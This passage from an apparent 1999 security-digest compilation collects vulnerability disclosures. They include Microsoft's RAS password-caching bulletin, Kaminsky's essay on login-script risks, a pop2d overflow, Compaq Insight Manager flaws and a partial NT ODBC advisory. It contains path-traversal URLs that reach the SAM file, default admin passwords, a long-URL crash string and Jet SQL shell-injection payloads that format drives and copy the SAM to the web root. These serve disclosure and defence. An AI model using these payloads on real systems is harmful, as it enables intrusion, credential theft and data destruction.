- While there are no reports of customers being adversely affected by this
- vulnerability, Microsoft is proactively releasing a patch that restores
- correct functionality to the password caching function. The patch should be
- applied to all machines that are used as RAS or RRAS clients. It is
- important to note that RRAS servers also can be used as RRAS clients, and
- any machines used in such a capacity should have the patch applied as well.
-
-
- Affected Software Versions
- ==========================
- - Microsoft Windows NT Workstation 4.0
- - Microsoft Windows NT Server 4.0
- - Microsoft Windows NT Server 4.0, Enterprise Edition
-
- What Microsoft is Doing
- =======================
- Microsoft has released patches that fix the problem identified. The patches
- are available for download from the sites listed below in What Customers
- Should Do.
-
- Microsoft also has sent this security bulletin to customers
- subscribing to the Microsoft Product Security Notification Service.
- See http://www.microsoft.com/security/services/bulletin.asp for
- more information about this free customer service.
-
- Microsoft has published the following Knowledge Base (KB) article on this
- issue:
- - Microsoft Knowledge Base (KB) article Q230681,
- RAS Credentials Saved when "Save Password" Option Unchecked,
- http://support.microsoft.com/support/kb/articles/q230/6/81.asp
- - Microsoft Knowledge Base (KB) article Q233303,
- RRAS Credentials Saved when "Save Password" Option Unchecked,
- http://support.microsoft.com/support/kb/articles/q233/3/03.asp
-
- (Note: It might take 24 hours from the original posting of this bulletin for
- the KB article to be visible in the Web-based Knowledge Base.)
-
- What Customers Should Do
- ========================
- Microsoft highly recommends that customers evaluate the degree of risk that
- this vulnerability poses to their systems and determine whether to download
- and install the patch. The patch can be found at:
- - RAS:
- ftp://ftp.microsoft.com/bussys/winnt/winnt-public
- /fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/
- - RRAS:
- ftp://ftp.microsoft.com/bussys/winnt/winnt-public
- /fixes/usa/nt40/Hotfixes-PostSP5/RRASPassword-fix/
-
- (Note: The URLs above have been wrapped for readability)
-
- More Information
- ================
- Please see the following references for more information related to this
- issue.
- - Microsoft Security Bulletin MS99-017,
- Patch Available for "RAS and RRAS Password Caching"
- Vulnerability, (The Web-posted version of this bulletin),
- http://www.microsoft.com/security/bulletins/ms99-017.asp.
- - Microsoft Knowledge Base (KB) article Q230681,
- RAS Credentials Saved when "Save Password" Option Unchecked,
- http://support.microsoft.com/support/kb/articles/q230/6/81.asp.
- - Microsoft Knowledge Base (KB) article Q233303,
- RRAS Credentials Saved when "Save Password" Option Unchecked,
- http://support.microsoft.com/support/kb/articles/q233/3/03.asp
-
- Obtaining Support on this Issue
- ===============================
- If you require technical assistance with this issue, please
- contact Microsoft Technical Support. For information on
- contacting Microsoft Technical Support, please see
- http://support.microsoft.com/support/contact/default.asp.
-
- Revisions
- =========
- - May 27, 1999: Bulletin Created.
-
-
- For additional security-related information about Microsoft products, please
- visit http://www.microsoft.com/security
-
-
- ----------------------------------------------------------------------
-
- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
- WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
- EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
- FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
- SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
- INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
- EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
- POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
- LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
- FOREGOING LIMITATION MAY NOT APPLY.
-
- (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
-
- *******************************************************************
- You have received this e-mail bulletin as a result of your registration
- to the Microsoft Product Security Notification Service. You may
- unsubscribe from this e-mail notification service at any time by sending
- an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
- The subject line and message body are not used in processing the request,
- and can be anything you like.
-
- For more information on the Microsoft Security Notification Service
- please visit http://www.microsoft.com/security/bulletin.htm. For
- security-related information about Microsoft products, please visit the
- Microsoft Security Advisor web site at http://www.microsoft.com/security.
-
- -------------------------------------------------------------------------------
-
- Date: Fri, 28 May 1999 07:59:35 -0400
- From: Russ <Russ.Cooper@RC.ON.CA>
- To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
- Subject: Re: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords
-
- Wow, talk about goofing up.
-
- Eric Schultze correctly pointed out that he, together with Lisa
- O'Connor, Martin Dolphin, and Joe Greene reported this problem with RAS
- originally way back on March 19th, 1998 <-- (note, 1998, not 1999). See
- the original message at;
-
- http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9803&L=ntbu
- gtraq&F=P&S=&P=4209
-
- (URL is wrapped).
-
- I, most inappropriately, credited another with the discovery in March of
- this year.
-
- Its funny, when David LeBlanc first prompted me about this "discovery"
- this year, I could have sworn I'd seen it before but I failed to check
- my own archives...tsk tsk...;-]
-
- So, to Lisa, Martin, Joe, and Eric, please accept my humble apologies!
-
- To Microsoft, why the hell did it take a publication in a German
- magazine to provoke you to fix something that had been reported here a
- full year before?? Could it have been the fact that the 3/99 publication
- included an exploit tool? Maybe we need to have an exploit coding group
- at NTBugtraq that produces a tool for everything reported and
- distributes said tool to all and sunder?
-
- Cheers,
- Russ - NTBugtraq Editor
-
- @HWA
-
- 49.0 Whitepaper:The Unforseen Consequences of Login Scripts By Dan Kaminsky
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Seen via PacketStorm, scarfed from : http://doxpara.netpedia.net/login.html
-
- Insecurity By Design:
- The Unforseen Consequences of
- Login Scripts
-
- By Dan Kaminsky
-
-
- A common aspect of most client-server network designs is the login script. A
- set of commands executed upon provision of correct username and password,
- the login script provides the means for corporate system administrators to
- centrally manage their flock of clients. Unfortunately what┤s seemingly good for
- the business turns out to be a disastrous security hole in the University
- environment, where students logging into the network from their dorm rooms
- now find the network logging into them. This hole provides a single, uniform
- point of access to any number of previously uncompromised clients, and is a
- severe liability that must be dealt with with the highest urgency. Even those in the
- corporate environment should take note of their uncomfortable exposure and
- demand a number of security procedures described herein to protect their
- networks. One possible solution for some may be the DoxPrint system designed
- by this author; it allows users to print to Novell Print Queues over the Network
- Neighborhood without requiring any Novell code on the client. Affected
- universities should consider switching to systems that do not require full logins,
- until more stable and secure systems are available.
-
-
-
- What if I told you that every time you turned on your computer, the government
- could control exactly what would load? What if, every time you entered your
- username and password, your ISP gained the ability to specify exactly what
- software should load, what files to send, maybe even what data to erase? What
- if, merely by accessing a web page, your system came under the full control of
- the page's author, or more accurately any possible author of that page,
- authorized or not?
-
- In each case, the security violation is quite obvious. Merely drawing electricity,
- connecting to the Internet, or accessing a web page does not constitute an open
- license to fully control a computer. In legal terms, each action by the user is an
- ongoing communication under contractural obligations--for example, the user
- agrees to pay a fee and provide authentication material in the form of username
- and password, and in return the ISP agrees to provide Internet access. Never
- does the user agree to a "remote root access contract"! Whether this access is,
- in fact, used or abused is irrelevant. None of the user's actions constitutes
- acceptance of "handing over the keys of the computer" to an external agent.
-
-
-
- Of course, sometimes the issue of what, exactly, the term "user" means becomes
- muddled. In a corporate environment, the user of the computing environment is
- not necessarily its owner, nor is he or she the highest authority regarding what
- should or shouldn't run on the machine. Login scripts, composed of lists of
- commands to be executed on the client machines upon the correct provision of
- username and password, provide a means for the central administrators of
- corporate computers to automatically connect to network drives and printers.
- They also allow the administrators to load any software they choose upon the
- client computers as if the user himself had run it. Anything from Censorware to
- remote control software is within the power of the administrator to load. This
- freedom to centrally manage systems is extremely powerful. Some would argue
- that it's an intrinsic capability of any client-server architecture that claims to be
- "ready for the enterprise", as the prospect of physically handling each client
- machine is extraordinarily expensive in terms of funds and manpower. With
- every major client-server networking architecture automatically executing the
- commands contained within login scripts *by default*, it would appear that
- networking engineers are serving the perceived requirements of the corporate
- mentality quite well.
-
- Small problem: University dorm networks aren't corporate.
-
-
-
- The authentication procedures built into Windows NT Domains and Novell
- Netware are often used by Universities as a means for controlling access to file
- and print resources. Both the University and the student are in an advanced
- version of an Internet Service contract, but it's an ISP contract nonetheless. The
- user(student) agrees to pay a fee(tuition) and provide authentication material in
- the form of username and password, and in return the ISP(University) agrees to
- provide access to network resources. Unfortunately, to provide access to file
- and print resources, Windows(the predominate computing environment on the
- desktop) cannot generally delay the login procedure until the time of actual
- usage. Indeed, just as in the corporate world, the system is presumed to be the
- property of the institution and the student/employee must thus authenticate him or
- herself upon startup of the machine. Also, just as in the corporate world, the
- system will by default execute any commands the system administrators have
- deemed appropriate.
-
- The school does not own the hardware, nor does it own the operating system
- running upon it. Even if it did both, it would not own the data on those systems;
- students do not generally relinquish ownership of their own labor to their
- educational institution. It is of the highest inappropriateness, then, that University
- Information Technology departments receive full access to that which is plainly
- not theirs. It's not their faults, really. They just want to track use and prevent
- abuse of pseudo-public resources. The only way to do this lies with the
- corporate authentication mechanisms within Netware and NT Domains. That the
- default setting in both environments is to load any login script provided is the fault
- of their respective designers, not of the accidental victims in IT. Ironically, not a
- bug but a long standing design decision is responsible for what is likely the
- greatest single computer security vulnerability at many universities.
-
-
-
- Saying that Login Scripts--something which, for so long, have been considered
- as innocuous as an ugly background--are indeed such a powerfully damaging
- technology is a strong statement that needs to be backed up. Login Scripts are
- so dangerous because they eliminate the most effective element of the security
- design behind Windows 95 and Windows 98: Security Through Impossibility.
- By default, Windows runs almost no services. You can't telnet in, you can't view
- the screen remotely, and there is no sendmail or ftp server with buffers to
- overflow. The only common service run is the infamous NetBIOS. The result of
- this restrictive environment is interesting: While it's not particularly difficult to
- remotely crash a 95/98 machine, it's surprisingly hard to remotely compromise
- this erstwhile insecure operating system without at least some interaction from the
- user. It's the difference between a locked door and a brick wall.
-
- Some arguably overzealous administrators will use this facet of security to ban
- any and all services not explicitly authorized(by an Act of God, usually). This
- can be excessive, and often prevents significant educational and productivity
- benefits. It's not that services are necessarily worrisome so much as the universal
- deployment of identically insecure services with significant value compromisable
- by unauthorized access--dedicated servers, unfortunately, have a tendancy to fit
- very nicely into this category. Sysadmins understand well that since both their
- servers are at risk and downtime is expensive, it is necessary to have recent
- backups of servers at all times. Sometimes, client desktops are also backed up.
- But, in an educational institution, it is grossly improper for the university to have
- copies of student/client data. Worse, as most computers ship with no
- system-scale tape backup, very few students are able to back up their data.
- This means that gigabytes of student data are protected only by the security built
- into their operating system. This actually isn┤t too awful--no default remote
- access has its advantages--until the login scripts are compromised. Since the
- login scripts reside on servers that in general are never considered fully secure by
- nature of the services they run, and which are further targeted due to the high
- value gained by a successful penetration, we see the heretofore impossible
- compromisation of every single networked Windows station nearly
- simultaneously as being only a matter of changing a few commands in a login
- script. Crack one server, and you crack a thousand clients whose only "crime"
- was stating their identity. That's one tough lesson.
-
- Sadly, some university administrators have responded to this observed threat by
- claiming that 1) they'd never maliciously enter anything into the login scripts and
- 2) they're pretty much the only ones with access to the login scripts, so "nothing
- would ever happen." If there was ever a set of famous last words for a system
- administrator, these would be them. They've got the keys to systems they don't
- own, and it's probable that their users don't even know it. Their intentions are
- irrelevant; they're not generally the ones to worry about. As I told one admin,
- "It's not you I distrust. It's your computer. Maybe you'll accidentally share the
- wrong directory. Maybe you┤ll be forwarded to a web site that will use a
- backdoor to initiate a remote LANMAN authentication. Perhaps a 95/98
- machine you logged into as Administrator for the domain will have its .PWL files
- cracked. Or maybe somebody will sneak in in the middle of the night and install
- a keylogger. With one hack providing access to *everybody*'s machine, it's
- worth it for a cracker to attack; isn't it worth it for you to defend?"
-
-
-
- If this is making sysadmins in the corporate sector nervous...it should. Yes, the
- downside to centralized management is indeed single point of massive failure.
- More than ever, businesses are just one disgruntled system adminstrator away
- from a task-scheduled mass virus infection--or worse. While indeed there are
- methods for disabling the loading of login scripts, their all-or-nothing nature
- makes them unrealistic in many environments. Businesses should not need to
- choose between tremendous risk and necessary functionality. Microsoft and
- Novell need to implement the following functionality in their login script code:
-
- 1) Script Capabiltiies. Login scripts allow drives to be mounted, printers to be
- connected, applications to be loaded from remote drives, and so on. System
- administrators need the ability to specify exactly which commands a client
- machine should honor. This provides a barrier to abuse--a site that only uses
- login scripts to mount network drives should be able to restrict clients to the
- degree of functionality the site requires. There are going to be issues, of course,
- with executable code on remote drives. To address this, we require...
-
- 2) Data Signatures. Cryptographic signatures on executable content, most
- commonly used by Microsoft's Authenticode system, provide a means for
- insecure systems to verify the appropriateness of remotely executed code.
- Sysadmins should be able to "sign" login scripts, as well as commonly executed
- remote code, and then specify that unless the client detects a signature from a
- "trusted" list, the content should be considered unauthorized. Sysadmins should
- also be able to sign actual executables(and maybe even data files) as acceptable
- for remote execution.
-
- 3) Executable hash checking. A slightly different tact might be to have clients
- cache hash values of specific files commonly run. Given a change from one
- session to another in the file hash, a trap could be sent to the administrator noting
- him or her that a system breach may have occurred. It┤s one thing to replace the
- contents of a file, but it┤s another to have to operate against the memory of every
- client that accessed the old file. This is a useful way to flip the disadvantage of
- large numbers of dumb machines into an advantage of intelligent agents with
- configurable responses to non-matching hashes.
-
- Of course, the ultimate solution to this issue is to emulate a an alternate login
- paradigm that Win95/98 implements to some degree. As Russ Cooper, editor
- of NTBugTraq, writes:
-
- There is *no need* for a client machine (be it Win9x or NT) to logon in to a domain in
- a way that would invoke a login script in order to gain access to its resources. You
- log into the machine itself (the client machine), and then connect to the resource
- and supply a userID and password. This will establish the connection, without
- invoking the login script. Bingo, problem solved, no?
-
- Novell and many other systems need to emulate this usage paradigm post-haste,
- and institutions still using full Domain logins must cease as soon as possible.
-
-
-
- Universities should consider implementing systems that do not require any form
- of login procedure for the user to access his or her own computer. The
- reasoning for this is a matter of ownership--what right does a university have to
- deny a user access to his or her own computer? Password security is
- notoriously bad anyway, and is far too insecure for any degree of
- non-repudiability. I┤m working on a solution for switched hubs involving using
- MAC Caches to allow trustable two-way communication traces.
-
- Those who insist upon using login procedures need to be disable them
- immediately for dorm-room computers. Students who need to connect to
- specific shares should be given a batch script to load--this will, incidentally,
- eliminate nasty situations where login scripts appropriate for one
- environment(say, the capturing of LPT1 to a printer port) are completely
- inappropriate in another(say, when that same user is in their dorm room).
-
- For those administrators running Novell Netware all the way to your student┤s
- desktop, I implore you to evaluate DoxPrint. DoxPrint allows sysadmins to
- enjoy most of the advantages of running Netware servers on the backend while
- sparing Windows clients the hardship of installing and maintaining the Novell
- client code. All access occurs over the Network Neighborhood, and is quite
- flexible in its programmability and authentication. It┤s been tested and proven as
- a powerful solution to some of the problems Netware creates.
-
-
- It┤s a strange thing, that such a common function would turn out so open for
- abuse. System designers who create new functionality need to include security
- considerations at every phase of the design process. Any time network access
- to a system is introduced, there is a significant burden of functionality upon
- the system to verify that the actions executed on behalf of the remote agent
- are appropriate. Failure to meet this burden is technical irresponsibility and
- must be prevented at all costs.
-
- I am immensely curious as to the reactions of Microsoft, Novell, and any other
- administrator who is reading this now. Please, send me your opinions; I┤ll
- publish the best of the replies.
-
-
- @HWA
-
-
- 50.0 Vulnerability in pop2.imap
- ~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Wed, 26 May 1999 20:37:13 +0100
- From: Chris Evans <chris@FERRET.LMH.OX.AC.UK>
- To: BUGTRAQ@netspace.org
- Subject: Remote vulnerability in pop2d
-
- Hi
-
- Firstly, sorry if any details are hazy - this is from memory (it's two
- months since I last looked at this). This bug concerns the pop-2 daemon,
- which is a part of the Washington University imap package.
-
- I've been waiting for a CERT advisory, but one doesn't seem to be
- forthcoming. Two and a half months is a long time. Also, the problem has
- been fixed for a long time. I'm posting because
-
- a) A fixed full release is available, so people should know about it
- b) The flaw is fairly basic and easy to spot, so active exploitation could
- well be happening
-
- Quick details
- =============
-
- Compromise possible: remote users can get a shell as user "nobody"
- If: runing pop-2d v4.4 or earlier
-
- Fixed version: imap-4.5, available now.
-
-
- Not vulnerable
- ==============
- RedHat-6.0 isn't vulnerable because imap-4.5 was shipped.
-
- Vulnerable
- ==========
-
- Anyone who shipped the pop-2 component of imap-4.4 or earlier, including
- earlier RedHat releases
-
-
- Details of flaw
- ===============
-
- pop-2 and pop-3 support the concept of an "anonymous proxy" whereby remote
- users can connect and open an imap mailbox on _any server they have a
- valid account on_. An attacker connects to the vulnerable pop-2 port and
- connects it to an imap server under their control. Once logged on, issuing
- a "FOLD" command with a long arg will cause an overflow of a stack based
- buffer.
-
- The arg to FOLD must be somewhere around 1000 bytes - not much bigger, not
- much smaller. Look at the source.
-
- Additional
- ==========
-
- I think the concept of "anonymous proxy" is just fundamentally insecure.
- It opens up a large code path for remote usrs to explore, i.e. the
- protocol parsing of imap, etc.
-
- The author of imap very responsibly includes a compile time flag to
- disable this in 4.5.
-
- Better still, RedHat-6.0 ships with the proxy disabled.
-
-
- Cheers
- Chris
-
-
- @HWA
-
- 51.0 Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Wed, 26 May 1999 16:41:36 +0100
- From: gabriel.sandberg@INFOSEC.SE
- To: BUGTRAQ@netspace.org
- Subject: Infosec.19990526.compaq-im.a
-
- Infosec Security Vulnerability Report
- No: Infosec.19990526.compaq-im.a
- =====================================
-
- Vulnerability Summary
- ---------------------
-
- Problem: The web server included in Compaq Insight
- Manager could expose sensitive information.
-
- Threat: Anyone that have access to port 2301 where
- Compaq Insight Manager is installed could get
- unrestricted access to the servers disk through
- the "root dot dot" bug.
-
- Platform: Detected on Windows NT and Novell Netware servers
- running on Compaq hardware.
-
- Solution: Disable the Compaq Insight Manager web server or
- restrict anonymous access.
-
-
- Vulnerability Description
- -------------------------
- When installing Compaq Insight Manager a web server gets installed. This web
- server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This
- bug gives unrestricted access to the vulnerable server?s disk. It could easily
- get exploited with one of the URLs:
-
- http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
- http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf
-
- (How many dots there should be is install-dependent)
-
-
- Solution
- --------
- You could probably fix the problem by restricting anonymous access to the Compaq
- Insight Manager web server. If you are not using the web server, Infosec
- recommends disabling the service.
-
-
- Background
- ----------
- Infosec gives the credits to Master Dogen who first reported the problem
- (Windows NT and Compaq Insight Manager) to us and wanted us go public with a
- vulnerability report.
-
- Infosec have found that Novell Netware with Compaq Insight Manager have the same
- problem but is not as common as on Windows NT.
-
- Compaq Sweden was informed about this problem april 26, 1999.
-
-
- //Gabriel Sandberg, Infosec
- gabriel.sandberg@infosec.se
-
- ------------------------------------------------------------------------------
-
- Date: Wed, 26 May 1999 16:13:19 -0500
- From: Vacuum <vacuum@SWORD.DAMOCLES.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: Infosec.19990526.compaq-im.a
-
- Please disgregard previous post, the signature got in the way of a paste
-
-
- In addition to //Gabriel Sandberg, Infosec gabriel.sandberg@infosec.se's
- findings.
-
- Web-Based Management is enabled, by default, when you install the Compaq
- Server Management Agents for Windows NT.(CPQWMGMT.EXE) The web-enabled
- Compaq Server Management Agents allow you to view subsystem and status
- information from a web browser, either locally or remotely. Web-enabled
- Service Management Agents are availible in all 4.x versions of Insight
- Manager.
-
- Compaq HTTP Server Version 1.2.15 (Pre-Release)
-
-
- The only user accounts available in the Compaq Server Management
- Agent WEBEM release are listed below.
-
-
- http://111.111.111.111:2301/cpqlogin.htm
-
- account anonymous
- username anonymous
- password
-
- account user
- username user
- password public
-
- account operator
- username operator
- password operator
-
- account administrator
- username administrator
- password administrator
-
- http://111.111.111.111:2301/cpqlogin.htm?ChangePassword=yes
- is the url used to change the password. Unfortunately the password is
- the only information that can be changed and is stored in
- clear text in the following file.
-
- c:\compaq\wbem\cpqhmmd.acl
- -------------------------------------------------------------------------------------
- Compaq-WBEM-AclFile, 1.1
- anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F
- login in progress... login in progress...
- 7A21DD9917C0C23907267FC07DBC7D12
- administrator administrator D6022D9B3FCA717CCEED36E640160478
- 51B02137D6BF719FC62F4940DBE1F3E6
- operator operator B5CE548356D1BEA5F1CFEE12FE9502C3
- 041D1015AEC9F60412C7F86E62D6672C
- user user
- EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A
-
- Once you have found one wbem enabled machine, using compaq's HTTP
- Auto-Discovery Device List http://111.111.111.111:2301/cpqdev.htm
- It is trivial to locate other machines.
-
- ------------------------------------------------------------------------------
-
- Date: Thu, 27 May 1999 21:43:09 -0500
- From: Vacuum <vacuum@SWORD.DAMOCLES.COM>
- To: BUGTRAQ@netspace.org
- Subject: Re: Infosec.19990526.compaq-im.a (New DoS and correction to my previous post)
-
- Upon further research, I must retract my earlier statement that the
- Compaq Insight Manager Web Agent's passwords are stored in clear text.
- Infact, what we see in cpqhmmd.acl are the account name and username in
- clear text NOT the password.
-
- Explanation of username and password combinations mentioned in my previous
- post.
-
- c:\compaq\wbem\cpqhmmd.acl
- or
- http://111.111.111.111:2301/../../../compaq/wbem/cpqhmmd.acl
- cpqhmmd.acl contents:
- Compaq-WBEM-AclFile, 1.1
- anonymousanonymous737EEEFA7617ED94EDD74E659B83035F
- login in progress...login in progress...7A21DD9917C0C23907267FC07DBC7D12
- administratoradministrator37741E7AC5B9871F87CE6ABE15B28FCB070293B3998C461D866E277A259619F0
- operatoroperatorB5CE548356D1BEA5F1CFEE12FE9502C3041D1015AEC9F60412C7F86E62D6672C
- useruserEC286E733A8892ADFC895611D1557557C865DE636CA398F8523EDBE5700D457A
-
- The default usernames and password combinations that I mentioned in my
- previous
- post are still valid.
-
- Once again these are the defaults: account: anonymous username: anonymous
- password:
- account: user username: user password: public
- account: operator username: operator password: operator
- account: administrator username: administrator password: administrator
-
- There are three types of data:
- Default(read only), Sets(read/write), and Reboot(read/write).
- The WebAgent.ini file in the system_root\CpqMgmt\WebAgent directory
- specifies the level
- of user that has access to data . The "read=" and "write=" entries in the
- file set the
- user accounts required for access, where: 0 = No access, 1 = Anonymous, 2
- = User,
- 3 = Operator, and 4 = Administrator.
- Changing these entries changes the security. The web-enabled Server Agent
- service must
- be stopped and restarted for any changes to take effect. Do not modify
- anything except
- the read/write levels.
-
- New Denial of service:
-
- Just to make this post somewhat worthwile.
- http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the
- minimum)
-
- The first time this occurs, an application error occurs in surveyor.exe
- Exception: access violation (0xc0000005), Address: 0x100333e5
-
- If you restart the Insight Web Agent Service and repeat it
- will cause an application error in cpqwmget.exe
- Exception: access violation(0xc0000005), Address 0x002486d4
-
- The http://111.111.111.111 will no longer respond until the service is
- stopped and restarted.
-
- Apologies for my previous error.
- vac
-
- ------------------------------------------------------------------------------
-
- Date: Fri, 28 May 1999 08:54:10 -0400
- From: Ricky Mitchell <rjmitchell@COLUMBIAENERGYGROUP.COM>
- To: BUGTRAQ@netspace.org
- Subject: second compaq insight manager vulnerablilty
-
- Greetings,
-
- Yesterday while I was removing the "web insight agent" service from the our
- vulnerable NT servers, I noticed on some machines that port 2301 was still
- vulnerable. To completely remove the problem, make sure you also stop the
- "surveryor" service as well if you have that installed. That will
- completely shut off access to port 2301 and plug the hole.
-
- Regards,
-
- Rick Mitchell
- NT administrator
- Columbia Gas Transmission Corp
-
- @HWA
-
- 52.0 Advisory: NT ODBC Remote Compromise
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Date: Tue, 25 May 1999 13:59:30 -0500
- From: .rain.forest.puppy. <rfp@WIRETRIP.NET>
- To: BUGTRAQ@netspace.org
- Subject: Advisory: NT ODBC Remote Compromise
-
- --[ Advisory: NT ODBC Remote Compromise
-
- --[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
- --[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net
-
- --[ Brief Summary
-
- MS Jet database engine (which runs Access databases) allows an individual
- to embed VBA in string expressions, which may allow the individual to run
- commandline NT commands. This, combined with the flaw of IIS running ODBC
- commands as system_local allow a remote attacker to have full control of
- the system. Other webservers may be affected. Many MS Jet engines are
- affected, but may not lead to elevated priviledges.
-
- --[ Background
-
- ODBC allows a program flexible access to one or more relational databases
- using SQL. If a client fails to quote correctly the meta characters in a
- piece of data used in an SQL query, an attacker may be able to interfere
- with the tables in the database (see MS SQL appension 'feature' in Phrack
- 54, article 8).
-
- However, the Microsoft "Jet" database engine (aka MS Access) provides some
- extensions to SQL which allow the execution of VBA (Visual Basic for
- Applications). This makes holes in meta character quoting code much more
- interesting and dangerous.
-
- --[ What form does the hole take?
-
- In SQL, strings must be enclosed in single quotes. If a string includes a
- single quote it must be escaped by doubling it up.
-
- The Jet engine extends this by allowing strings to enclose a VBA
- expression inside vertical bar characters in the string, like this:
-
- select 'lil'' string | 6+7 | with number' as foo from table;
-
- This will produce a recordset containing one field with the value "lil'
- string 13 with number" for each row of the input table. Innocent enough,
- if the CGI or ASP programs correctly quote the incoming data.
-
- However, since the pipe operator is a rather obscure character and is very
- poorly documented, most people don't know it's there - apparently even
- Microsoft programmers.
-
- --[ It's a feature, not a bug!
-
- Note the following excerpt from a MS Knowledge Base article:
- (http://support.microsoft.com/support/kb/articles/q147/6/87.asp)
-
- Pipe Character or Vertical Bar
-
- The pipe character or vertical bar is a reserved character for the Jet
- database engine. It tells the Jet database engine to evaluate the
- identifier before evaluating the rest of the expression. Therefore, the
- Jet database engine inserts the value of the identifier in the expression,
- and then evaluates it.
-
- Vertical bars are used most often in domain aggregate functions when you
- want the function to automatically recalculate the value it returns in
- filters. Or vertical bars are used as an alternative to the ampersand (&)
- operator when you concatenate text values. Because of this, you cannot
- embed the vertical bar (|) in a literal string, you must embed the Chr()
- function. Chr(124) is the vertical bar.
-
- --[ Where does it apply?
-
- Any textual data included in a Jet SQL query can contain quoted VBA,
- whether it is in data to be inserted in a new record or part of a
- condition expression. This makes the hole very general (or flexible, if
- you prefer), since you don't need to know the context in which the string
- will be evaluated.
-
- --[ What commands are available?
-
- The biggest restriction is that the code must be evaluated in an
- expression context - no statements.
-
- Anything listed as "VBA" in the "Functions Reference" page of the Access
- Help file will work, although this seems to vary between versions of the
- Jet engine - for example, in some cases the "eval" function works and in
- others it doesn't (although when it is available, eval doesn't actually
- help much because the |...| operator offers a similar if not identical
- context).
-
- The most useful command is "shell", although this in itself cannot do
- redirections or pipes - cmd.exe can assist with this though. By using the
- shell function and running cmd.exe, an attacker can run any command on the
- system.
-
- environ() can also be useful to get environment variables values into your
- commands, and chr() can be very handy for quoting awkward characters using
- alphanumerics and brackets. There are also the standard functions like
- iif() and various string operations (use "&" for concatenation).
-
- It would be very difficult to include any kind of loop in the VBA fragment
- because loops do not have return values.
-
- --[ Which characters need quoting, and how?
-
- If the exploit string will be passing through anything that tries to
- escape special characters then ' will be double up - best to use "
- instead.
-
- Ironically, the vertical bar character can only be escaped by using it to
- evaluate the chr(124) function.
-
- VBA will take pairs of double-quotes (") in a VBA string constant the same
- way SQL will take pairs of single-quotes. If this doesn't seem to work you
- can always use chr(34).
-
- ASP also provides a convenient debugging aid - if the expression cannot be
- correctly evaluated the error message will often include the whole SQL
- query with the partially decoded exploit string in it--this could help an
- attacker 'tweak' the exploit string until it works.
-
- If the command needs to be broken up with newlines, they can be inserted
- between VBA operators inside the |...| construction.
-
- --[ How about a practical example?
-
- An example of a pipeline:
-
- |shell("cmd /c echo " & chr(124) & " format a:")|
-
- will format whatever is in the floppy drive at the time. Any errors will
- be silently ignored, although an iconised window will take the focus for
- the duration of the command.
-
- Using "cmd /c" allows the command piping necessary to get a newline into
- the format command, otherwise the pipe and 'format' are passed as
- arguments to 'echo'.
-
- This string can be included in anything from a simple ODBC operation to a
- text item in an ASP form on a web page. The function will normally
- evaluate to a two or three digit number.
-
- A more sophie's-stick-ate-it example involves grabbing a copy of the SAM:
-
- |shell("cmd /c rdisk /S-")|
- |shell("cmd /c copy c:\winnt\repair\sam._ c:\inetput\wwwroot")|
-
- ** this example includes assumptions about the location of the
- ** system and www publishing directory; it's only an example
-
- Commands can be stacked:
-
- |shell("cmd /c echo 1 > %temp%\foo.txt") & shell("cmd /c echo 2 \
- >> %temp%\foo.txt") & shell("cmd /c echo 3 >> %temp%\foo.txt")|
-
- ** line broken for clarity
-
- It is not clear that the commands will always be executed in order. Each
- shell command executes asynchronously so the code above has two races for
- whether the shell commands finish updating the file before the next one
- starts - results will be variable.
-
- --[ Could an attacker modify registry keys?
-
- Ultimately the hole allows anything since you can up/download and run any
- code, but modifying registry keys from VBA seems to be a little tricky.
-
- The method using advapi32.dll won't work because it requires statements to
- declare functions from the library, but there doesn't seem to be a way of
- giving a statement a return value in VBA.
-
- It would be easier to create a temporary .reg file and then merge it with
- "cmd /c regedit /s %temp%\tmp.reg"; the '/s' is important, as it
- suppresses the informational dialogs/windows.
-
- --[ What permissions will an attacker have?
-
- The dangerous part comes from a context misinterpretation with IIS. IIS
- runs as system_local; it changes its token context (typically to IUSR_xxx)
- for filesystem access and application execution. However, the context
- does *NOT* change when interfacing with the ODBC API. Therefore all ODBC
- functions (and the associated database calls) are happening under
- system_local. This allows full access to the system.
-
- --[ Theory of exploitation
-
- This problem can be used over the web against scripts that make queries
- against local MS Jet ODBC DSNs, therefore, any script or application that
- uses a MS Jet ODBC DSN could potentially be exploited. The solution is to
- not use MS Jet ODBC drivers for any DSN--until Microsoft releases a fix.
- But since this is a documented feature, there stands a chance that some
- applications may break if removed.
-
- --[ Reality of exploitation
-
